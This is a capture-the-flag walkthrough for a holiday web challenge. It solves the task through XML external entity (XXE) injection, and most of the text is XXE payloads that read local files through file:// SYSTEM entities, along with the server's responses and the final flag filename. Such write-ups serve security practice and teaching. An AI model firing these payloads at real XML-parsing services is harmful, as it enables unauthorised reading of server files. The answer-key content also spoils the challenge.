Terminal: Glamtariels-Fountain

Fountain Area

Objective

Recover the Web Ring

Task 6: Glamtariel's Fountain

Difficulty: 5/5 Christmas Trees Description: Stare into Glamtariel's fountain and see if you can find the ring! What is the filename of the ring she presents you? Talk to Hal Tandybuck in the Web Ring for hints.

Solution

To speed past the initial two image sets, click and drag Santa, the candy cane, then the elf onto the Princess and the Fountain once each. When the second set of images has loaded, click and drag the ring, the igloo, then the sailboat onto each. The third set of images should load at this point, all four images being rings.

The bolded words discovered through this dialog will be:

TAMPER
PATH
APP
TYPE
RINGLIST
SIMPLE FORMAT

Updated the Content-Type header to application/xml, then POST the following XML data in the body of the request.

<?xml version="1.0" encoding="UTF-8"?><app><imgDrop>img4</imgDrop><who>princess</who><reqType>xml</reqType></app>

If sent before reaching the third set images, the following response will be returned.

{
  "appResp": "Zoom, Zoom, very hasty, can't do that yet!^Zoom, Zoom, very hasty, can't do that yet!",
  "droppedOn": "none",
  "visit": "none"
}

After reaching the appropriate image set, the same XML data will return the following JSON.

{
  "appResp": "I love rings of all colors!^She definitely tries to convince everyone that the blue ones are her favorites. I'm not so sure though.",
  "droppedOn": "none",
  "visit": "none"
}

Verify XXE injection is working by injecting the expected string.

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "img1" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

The ringlist file is accessible via XXE injection in a POST request to /dropped. The full file path was discovered by brute-forcing potential combinations. The /app directory was discovered via the dialog hint, while the /static/images portion was discovered via the path of the folders containing the image resources loaded by the main page.

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/ringlist.txt" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

{
  "appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
  "droppedOn": "none",
  "visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
}

View the visit resource in the browser to retreive the following image. Pasted image 20221211170825

Use the folder and file names in the image with the XXE LFI to gather more responses.

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/bluering.txt" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

{
  "appResp": "I love these fancy blue rings! You can see we have two of them. Not magical or anything, just really pretty.^She definitely tries to convince everyone that the blue ones are her favorites. I'm not so sure though.",
  "droppedOn": "none",
  "visit": "none"
}

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/redring.txt" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

{
  "appResp": "Hmmm, you still seem awfully interested in these rings. I can't blame you, they are pretty nice.^Oooooh, I can just tell she'd like to talk about them some more.",
  "droppedOn": "none",
  "visit": "none"
}

Since the Princess mentioned extra stuff about a silver ring in previous dialog, request that resource with the XXE injection.

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/silverring.txt" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

{
  "appResp": "I'd so love to add that silver ring to my collection, but what's this? Someone has defiled my red ring! Click it out of the way please!.^Can't say that looks good. Someone has been up to no good. Probably that miserable Grinchum!",
  "droppedOn": "none",
  "visit": "static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px"
}

The linked image of the red ring has an inscription inside. Pasted image 20221211171310

Zoom in and rotate to view the text clearly. Pasted image 20221211171516

Request this file through the XXE injection.

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

{
  "appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
  "droppedOn": "none",
  "visit": "none"
}

There had also been a green ring mentioned, request that resource.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/greenring.txt" >]><foo><imgDrop>&xxe;</imgDrop><who>princess</who><reqType>xml</reqType></foo>

{
  "appResp": "Hey, who is this guy? He doesn't have a ticket!^I don't remember seeing him in the movies!",
  "droppedOn": "none",
  "visit": "static/images/x_phial_pholder_2022/tomb2022-tommyeasteregg3847516894.png,230px,30px"
}

This just unlocks an easter egg. Pasted image 20221211183404

Since the response dialog is mentioning REQ TYPE, move the injection payload into the reqType tags, then send the payload.

<?xml version="1.0" encoding="UTF-16"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]><foo><imgDrop>img1</imgDrop><who>princess</who><reqType>&xxe;</reqType></foo>

{
  "appResp": "No, really I couldn't. Really? I can have the beautiful silver ring? I shouldn't, but if you insist, I accept! In return, behold, one of Kringle's golden rings! Grinchum dropped this one nearby. Makes one wonder how 'precious' it really was to him. Though I haven't touched it myself, I've been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!",
  "droppedOn": "none",
  "visit": "static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px"
}

Visiting the link will display the third gold ring. Pasted image 20221212105844

Return to the Fountain Area to submit the filename goldring-morethansupertopsecret76394734.png to the badge form field.